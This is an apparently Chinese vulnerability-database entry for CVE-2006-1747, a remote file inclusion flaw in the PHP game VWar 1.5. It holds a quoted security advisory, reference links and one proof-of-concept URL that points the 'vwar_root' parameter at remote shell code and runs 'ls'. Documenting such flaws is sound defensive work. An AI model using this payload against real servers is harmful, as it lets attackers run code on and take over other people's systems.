VWar admin.php远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110747 漏洞类型 输入验证
发布时间 2006-08-07 更新时间 2006-08-07
CVE编号 CVE-2006-1747 CNNVD-ID CNNVD-200604-180
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/28356
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200604-180
|漏洞详情
VWar是一款基于PHP的虚拟战争程序。VWar的admin.php文件没有正确过滤用户请求,导致可能包含任意远程资源的文件,执行任意代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/19387/info
      
VWar is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input.
      
An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
      
These issues affect version 1.5; other versions may also be vulnerable.

http://www.example.com/[vwar_path]/stats.php?vwar_root=[Shell-code]?&cmd=ls
|参考资料

来源:BID
名称:17443
链接:http://www.securityfocus.com/bid/17443
来源:MILW0RM
名称:1658
链接:http://www.milw0rm.com/exploits/1658
来源:MISC
链接:http://www.blogcu.com/Liz0ziM/431925/
来源:MISC
链接:http://liz0zim.no-ip.org/vwar.txt
来源:XF
名称:virtualwar-member-file-include(28265)
链接:http://xforce.iss.net/xforce/xfdb/28265
来源:BID
名称:19387
链接:http://www.securityfocus.com/bid/19387
来源:BUGTRAQ
名称:20060408VirtualWarFileİnclusion
链接:http://www.securityfocus.com/archive/1/archive/1/430389/100/0/threaded
来源:MILW0RM
名称:1658
链接:http://milw0rm.com/exploits/1658
来源:BUGTRAQ
名称:20060807VirtualWarv1.5.0RemoteFileInclude(vwar_root)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=115497619330609&w=2